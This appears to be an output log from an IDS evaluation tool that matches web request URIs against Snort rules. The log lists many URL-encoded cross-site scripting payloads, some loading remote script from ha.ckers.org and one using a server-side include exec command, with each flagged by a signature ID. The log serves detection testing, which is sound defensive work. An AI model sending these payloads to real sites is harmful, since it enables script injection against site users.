# inspectorlog v3.5
#----- Initializing Rules (SNORT) ---------------------
# Rules directory : "/home/kali/Downloads/reglas_javi/snort"
#	Opening SNORT rule file /home/kali/Downloads/reglas_javi/snort/http_uri-sn-20220324.rules... done
#		Rules: read [3749], erroneous [0], URI [384]
#	Opening SNORT rule file /home/kali/Downloads/reglas_javi/snort/http_uri-er-20220224.rules... done
[parse_snortRule] WARNING: Line [4970] exceeds allowed number of PCRE fields
#		Rules: read [6015], erroneous [0], URI [5116]
#----- Statistics (SNORT) ------------------------------
# Read [9764] Snort rules, [5500] http-related, [0] with errors
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/kali/Downloads/inspectorlog/inspectorlog -l xss.uri -r /home/kali/Downloads/reglas_javi/snort -t list -o /home/kali/TFG/inspectorlog/snort/web_dinamica/owasp/opensource/grabber/xss.clean
Packet [51]	Uri [/web/?code=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [52]	Uri [/web/?code=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [57]	Uri [/web/?code=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [58]	Uri [/web/?code=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [75]	Uri [/web/?code=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [76]	Uri [/web/?code=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [77]	Uri [/web/?code=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [78]	Uri [/web/?code=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [79]	Uri [/web/?code=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [80]	Uri [/web/?code=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [81]	Uri [/web/?code=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [82]	Uri [/web/?code=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [86]	Uri [/web/?code=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [87]	Uri [/web/?code=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [108]	Uri [/web/?code=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [109]	Uri [/web/?code=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [114]	Uri [/web/?code=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [115]	Uri [/web/?code=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [124]	Uri [/web/?code=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [125]	Uri [/web/?code=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [126]	Uri [/web/?code=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [127]	Uri [/web/?code=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [128]	Uri [/web/?code=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [129]	Uri [/web/?code=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [130]	Uri [/web/?code=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [131]	Uri [/web/?code=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [136]	Uri [/web/?code=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [137]	Uri [/web/?code=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [142]	Uri [/web/?code=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [143]	Uri [/web/?code=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [154]	Uri [/web/?code=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [155]	Uri [/web/?code=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [162]	Uri [/web/?code=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [163]	Uri [/web/?code=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [172]	Uri [/web/?code=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [173]	Uri [/web/?code=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [188]	Uri [/web/?code=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [189]	Uri [/web/?code=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [192]	Uri [/web/?code=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [193]	Uri [/web/?code=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [202]	Uri [/web/?code=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [203]	Uri [/web/?code=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [210]	Uri [/web/?code=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [211]	Uri [/web/?code=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [272]	Uri [/web/?iterator=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [273]	Uri [/web/?iterator=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [278]	Uri [/web/?iterator=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [279]	Uri [/web/?iterator=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [296]	Uri [/web/?iterator=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [297]	Uri [/web/?iterator=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [298]	Uri [/web/?iterator=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [299]	Uri [/web/?iterator=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [300]	Uri [/web/?iterator=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [301]	Uri [/web/?iterator=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [302]	Uri [/web/?iterator=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [303]	Uri [/web/?iterator=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [306]	Uri [/web/?iterator=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [307]	Uri [/web/?iterator=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [328]	Uri [/web/?iterator=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [329]	Uri [/web/?iterator=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [334]	Uri [/web/?iterator=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [335]	Uri [/web/?iterator=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [344]	Uri [/web/?iterator=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [345]	Uri [/web/?iterator=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [346]	Uri [/web/?iterator=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [348]	Uri [/web/?iterator=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [349]	Uri [/web/?iterator=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [350]	Uri [/web/?iterator=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [351]	Uri [/web/?iterator=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [352]	Uri [/web/?iterator=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [357]	Uri [/web/?iterator=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [358]	Uri [/web/?iterator=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [363]	Uri [/web/?iterator=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [364]	Uri [/web/?iterator=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [375]	Uri [/web/?iterator=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [376]	Uri [/web/?iterator=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [383]	Uri [/web/?iterator=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [384]	Uri [/web/?iterator=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [393]	Uri [/web/?iterator=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [394]	Uri [/web/?iterator=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [409]	Uri [/web/?iterator=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [410]	Uri [/web/?iterator=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [413]	Uri [/web/?iterator=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [414]	Uri [/web/?iterator=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [423]	Uri [/web/?iterator=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [424]	Uri [/web/?iterator=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [431]	Uri [/web/?iterator=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [432]	Uri [/web/?iterator=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [477]	Uri [/web/?show=%3CIMG+SRC%3D%22http%3A%2F%2Fwww.thesiteyouareon.com%2Fsomecommand.php%3Fsomevariables%3Dmaliciouscode%22%3E]	Nattacks [1]	Signatures	[2010965]
Packet [478]	Uri [/web/?show=%3CIMG+SRC%3D%22http%3A%2F%2Fwww.thesiteyouareon.com%2Fsomecommand.php%3Fsomevariables%3Dmaliciouscode%22%3E]	Nattacks [1]	Signatures	[2010965]
Packet [493]	Uri [/web/?show=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [494]	Uri [/web/?show=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [499]	Uri [/web/?show=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [500]	Uri [/web/?show=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [517]	Uri [/web/?show=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [518]	Uri [/web/?show=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [519]	Uri [/web/?show=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [520]	Uri [/web/?show=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [521]	Uri [/web/?show=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [522]	Uri [/web/?show=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [523]	Uri [/web/?show=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [524]	Uri [/web/?show=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [527]	Uri [/web/?show=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [528]	Uri [/web/?show=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [549]	Uri [/web/?show=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [550]	Uri [/web/?show=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [555]	Uri [/web/?show=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
